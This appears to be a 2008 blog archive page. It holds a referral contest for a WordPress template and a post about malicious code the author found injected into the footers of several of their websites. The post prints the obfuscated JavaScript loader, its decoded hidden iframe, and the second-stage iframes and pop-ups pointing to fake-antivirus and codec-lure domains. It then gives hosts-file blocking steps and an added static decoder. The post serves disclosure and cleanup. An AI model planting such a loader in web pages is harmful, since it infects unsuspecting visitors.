Monthly Archives: July 2008

Win a WordPress template (MQ Faded)

By entering this contest you will get the chance to win one of my WordPress templates: MQ Faded.
The winner gets to do whatever he/she wants with it. So you can either keep it to yourself and have a unique blog design, or release it to the public. Either way I ask that you keep my link in the footer.

Contest start date: 07.26.2008

How to enter:
You will need to register with Web2logs via this link to enter, and refer as many people as you can to win. The URL you need to promote will be http://www.web2logs.com/register/user (replace user with your username).

Rules: No creating fake accounts, each user signed up under you must be unique. You must refer at least 50 people to be eligible.

Contest ends: When somebody refers 200 users.

Prize: WordPress template MQ Faded
Live stats at http://www.web2logs.com/stats.php

Good luck to you all.

Hacked!?

Recently I noticed something other than Google Analytics loading in the status bar when I visited some of my sites, so I thought I'd have a closer look.

Three of my sites had hidden links added in the footer and two of them had a piece of JavaScript.

Of course, I removed the links without thinking, but I did save the script.

Here is how the script looks:

<!-- ~ -->
<script type="text/javascript">
function oxsletpvxjt(qixfiot){
var ddrbvc="";
for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){
ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));
}document.write(ddrbvc);
}
oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));
</script>
<!-- ~ -->

Here is what the script does:

<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
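
The same decoding can be done on the page source as text, without letting a browser run the script. This is an added example, not part of the original post; the sample script, its junk token "qxz" and the example.invalid URL are constructed, and the function name decodeInjected is hypothetical.

```javascript
// Added example: statically decode the hex-plus-junk-token obfuscation.
// The script is handled as text only; nothing is evaluated or written to a page.

// Constructed sample in the same shape as the injected script. The names f/s/o,
// the junk token "qxz" and the example.invalid URL are made up for this example.
const SAMPLE_PAGE = `<p>footer</p>
<script type="text/javascript">
function f(s){var o="";for(i=0;i<s.length;i+=2){
o+=String.fromCharCode(parseInt(s.substr(i,2),16));}document.write(o);}
f("3Cqxz6966qxz72616D65qxz20qxz737263qxz3D22qxz687474703A2F2Fqxz6578616D706C65qxz2E696E76616C6964qxz2F22qxz3E3C2Fqxz696672616D65qxz3E".replace(/qxz/g, ""));
</script>`;

// Matches the call shape: "<payload>".replace(/<junk>/g, "")
const CALL_RE = /"([0-9A-Za-z]+)"\s*\.replace\(\s*\/([0-9A-Za-z]+)\/g\s*,\s*""\s*\)/g;

function decodeInjected(html) {
  const findings = [];
  for (const [, payload, junk] of html.matchAll(CALL_RE)) {
    const hex = payload.split(junk).join("");
    // Only accept clean hex byte pairs once the junk token is removed.
    if (hex.length === 0 || hex.length % 2 !== 0 || !/^[0-9a-fA-F]+$/.test(hex)) continue;
    let decoded = "";
    for (let i = 0; i < hex.length; i += 2) {
      decoded += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
    }
    // URLs the hidden markup would load: candidates for blocking and log searches.
    const urls = [...decoded.matchAll(/\bsrc\s*=\s*["']([^"']+)["']/gi)].map((m) => m[1]);
    findings.push({ junk, decoded, urls });
  }
  return findings;
}

for (const f of decodeInjected(SAMPLE_PAGE)) {
  console.log(`junk token: ${f.junk}\ndecoded: ${f.decoded}\nurls: ${f.urls.join(", ")}`);
}
```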

Here is the iframe content:

<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>

<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>

Probably a trojan of some kind; I didn't feel like looking any further.

The interesting thing is how that code got on my websites. I'm sure my account was not hacked; if it had been, all my sites would have been messed with, so I'm guessing it was the server that got hacked. What people would do for a few extra links and traffic.

So make sure you look in the source of your websites and if you find that piece of JavaScript at the end, just remove it.

As for the surfers, I guess you should block that site so you won't get infected with who knows what.

The easiest way to do that is to edit your hosts file.

Where to find hosts file:

Windows Vista  =  C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows XP     =  C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows 2K     =  C:\WINNT\SYSTEM32\DRIVERS\ETC
Win 98/ME      =  C:\WINDOWS

What the hosts file contents look like:

127.0.0.1       localhost

Edit it and add the unwanted site:

127.0.0.1       tumultuosum.com

How it should look now:

127.0.0.1       localhost
127.0.0.1       tumultuosum.com

So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he's just a big fat jerk and a lousy hacker.